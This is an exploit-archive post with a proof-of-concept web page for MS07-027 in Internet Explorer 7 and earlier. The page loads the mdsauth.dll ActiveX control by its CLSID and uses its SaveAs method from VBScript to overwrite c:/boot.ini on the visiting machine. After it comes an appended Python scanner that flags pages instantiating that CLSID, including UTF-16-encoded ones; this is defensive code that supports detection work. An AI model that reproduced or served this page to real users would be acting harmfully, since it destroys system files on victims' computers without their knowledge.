MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)
2007-05-13 21:30
CODE:
<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">
</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://www.514.es"
target.SaveAs "c:/boot.ini"
</script>
</body>
</html>
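A defensive content check for the pattern this PoC relies on, as an added example that is not part of the original post: it decodes the page by its byte-order mark (the PoC's comment notes the script is converted to UTF-16, which hides ASCII signatures from plain byte matching), flags `<object>` tags that instantiate the PoC's CLSID, and lists the members that page scripts access on them. The function names, the watchlist and the sample page are assumptions made for illustration.

```python
import codecs
import re
from html.parser import HTMLParser

# CLSID copied from the <OBJECT> tag in the PoC above; the set is an assumed watchlist.
WATCHED_CLSIDS = {"d4fe6227-1288-11d0-9097-00aa004254a0"}
BOMS = ((codecs.BOM_UTF16_LE, "utf-16-le"), (codecs.BOM_UTF16_BE, "utf-16-be"))

def decode_page(raw):
    # Honour a UTF-16 BOM first; otherwise treat the body as UTF-8
    # ("utf-8-sig" also strips a UTF-8 BOM when one is present).
    for bom, enc in BOMS:
        if raw.startswith(bom):
            return raw[len(bom):].decode(enc, errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

class ObjectScanner(HTMLParser):
    """Collect ids of <object> tags with a watched CLSID, plus all script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.script_text, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "object":
            classid = (attrs.get("classid") or "").strip().lower()
            m = re.fullmatch(r"clsid:\{?([0-9a-f-]{36})\}?", classid)
            if m and m.group(1) in WATCHED_CLSIDS:
                self.object_ids.append(attrs.get("id") or "")
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)

def scan(raw):
    # One finding per watched <object>, with the members page scripts touch on it.
    parser = ObjectScanner()
    parser.feed(decode_page(raw))
    parser.close()
    script = "".join(parser.script_text)
    return [{"id": oid, "members": sorted(set(
                re.findall(r"\b%s\.(\w+)" % re.escape(oid), script, re.I) if oid else []))}
            for oid in parser.object_ids]

# Constructed sample shaped like the PoC, encoded as UTF-16 with a BOM.
SAMPLE = ('<OBJECT id="target" classid="clsid:D4FE6227-1288-11D0-9097-00AA004254A0">'
          '</OBJECT><script language="vbscript">target.SaveAs "C:/placeholder.txt"'
          '</script>').encode("utf-16")
```

`scan(SAMPLE)` reports the `target` object together with its `SaveAs` call, even though the lowercase ASCII CLSID never appears as a contiguous byte sequence in the UTF-16 body.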